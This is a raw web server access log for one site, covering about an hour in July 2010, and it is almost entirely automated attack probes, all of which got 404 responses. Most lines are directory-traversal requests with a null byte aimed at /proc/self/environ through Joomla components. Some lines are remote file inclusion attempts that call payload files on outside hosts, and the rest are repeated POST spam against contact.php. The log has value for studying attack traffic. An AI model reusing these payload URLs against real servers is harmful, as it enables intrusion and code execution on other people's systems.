94.23.8.200 - - [31/Jul/2010:05:00:36 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:00:37 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:00:37 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:00:55 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:01:02 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:05:01:35 -0700] "GET /skin/zero_vote/error.php?dir=http://www.ct-asachi.ro/e107_themes/....../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:05:01:35 -0700] "GET /logs/access_100428.log//skin/zero_vote/error.php?dir=http://www.ct-asachi.ro/e107_themes/....../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:05:01:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ct-asachi.ro/e107_themes/....../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:02:40 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:02:40 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:02:41 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:04:26 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:04:27 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:04:27 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:04:58 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:05:23 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:05:23 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:05:24 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
64.34.172.171 - - [31/Jul/2010:05:06:12 -0700] "GET /logs/access_100428.log////?_SERVER[DOCUMENT_ROOT]=http://outsider-bg.com/_DOC/pid? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:05:07:02 -0700] "GET /logs/access_100429.log//skin/zero_vote/error.php?dir=http://www.ct-asachi.ro/e107_themes/....../id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:07:28 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:07:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:07:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:07:41 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:08:39 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:08:49 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:08:50 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:09:05 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:09:26 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:09:29 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:11:41 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:11:41 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:11:41 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:12:21 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:12:21 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:12:28 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:12:28 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:12:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:12:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:12:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
66.71.245.122 - - [31/Jul/2010:05:12:29 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:12:30 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:13:35 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:13:35 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:13:35 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
77.88.24.27 - - [31/Jul/2010:05:13:52 -0700] "GET /logs/access_100716.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:14:06 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:14:07 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:14:07 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:05:15:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:05:16:00 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:05:16:01 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
174.121.121.8 - - [31/Jul/2010:05:16:42 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
174.121.121.8 - - [31/Jul/2010:05:16:42 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:18:37 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:18:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:18:39 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:18:39 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:18:39 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:18:39 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
174.121.121.8 - - [31/Jul/2010:05:18:44 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.104.37.106 - - [31/Jul/2010:05:19:29 -0700] "GET /logs/access.log////index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.104.37.106 - - [31/Jul/2010:05:19:32 -0700] "GET ///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.104.37.106 - - [31/Jul/2010:05:19:32 -0700] "GET /logs////index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:20:38 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:20:39 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
91.121.78.216 - - [31/Jul/2010:05:20:39 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:35 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:35 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:37 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:38 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:44 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:44 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:46 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:21:47 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:05:22:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:22:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:22:41 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
205.251.131.33 - - [31/Jul/2010:05:22:43 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
89.108.67.164 - - [31/Jul/2010:05:24:12 -0700] "GET /logs/access_100520.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.hellionindustries.com"
89.108.67.164 - - [31/Jul/2010:05:24:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.hellionindustries.com"
89.108.67.164 - - [31/Jul/2010:05:24:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.hellionindustries.com"
89.108.67.164 - - [31/Jul/2010:05:24:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:05:25:22 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:05:25:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:05:25:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
89.108.67.164 - - [31/Jul/2010:05:26:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.hellionindustries.com"
174.121.121.8 - - [31/Jul/2010:05:30:44 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
174.121.121.8 - - [31/Jul/2010:05:30:44 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
174.121.121.8 - - [31/Jul/2010:05:30:47 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:05:30:56 -0700] "GET ///index2.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
89.108.67.164 - - [31/Jul/2010:05:31:30 -0700] "GET /logs/access_100428.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:05:32:09 -0700] "GET ///index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:32:44 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:32:45 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
94.23.8.200 - - [31/Jul/2010:05:32:45 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:40:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:40:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:41:45 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:41:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:41:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:05:41:54 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:05:41:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:05:41:54 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:42:11 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:42:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
64.202.115.179 - - [31/Jul/2010:05:42:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:42 -0700] "POST /logs/access_100429.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:43 -0700] "POST /logs/access_100429.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:44 -0700] "POST /logs/access_100429.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:45 -0700] "POST /logs/access_100429.log/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:05:53:46 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:06:02:25 -0700] "GET /logs/access.log////index2.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:06:02:26 -0700] "GET ///index2.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
188.165.213.8 - - [31/Jul/2010:06:02:26 -0700] "GET /logs////index2.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:06:06:19 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
